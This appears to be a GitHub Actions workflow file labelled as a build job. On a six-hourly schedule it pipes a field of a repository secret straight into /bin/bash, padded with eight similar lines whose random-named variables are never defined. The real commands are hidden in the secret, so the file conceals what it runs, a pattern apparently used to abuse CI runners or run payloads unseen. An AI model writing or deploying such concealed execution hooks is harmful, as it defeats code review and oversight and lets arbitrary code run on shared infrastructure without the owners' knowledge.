name: taishangwq
on:
  workflow_dispatch:
  schedule:
    - cron: '41 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: taishangwq
        env:
          w168: ${{ secrets.w168 }}
        run: |
          echo $w168 | jq -r .ljvc5635 | /bin/bash
          echo $cay9 | jq -r .sj914 | /bin/bash
          echo $fgnxt1763 | jq -r .wms193 | /bin/bash
          echo $uqgz9808 | jq -r .omqix51731 | /bin/bash
          echo $avcoa53495 | jq -r .hri65812 | /bin/bash
          echo $pucud3159 | jq -r .nztyv850 | /bin/bash
          echo $ys5 | jq -r .pmdq074 | /bin/bash
          echo $vtgk944 | jq -r .npnd7495 | /bin/bash
          echo $n59861 | jq -r .n5345 | /bin/bash

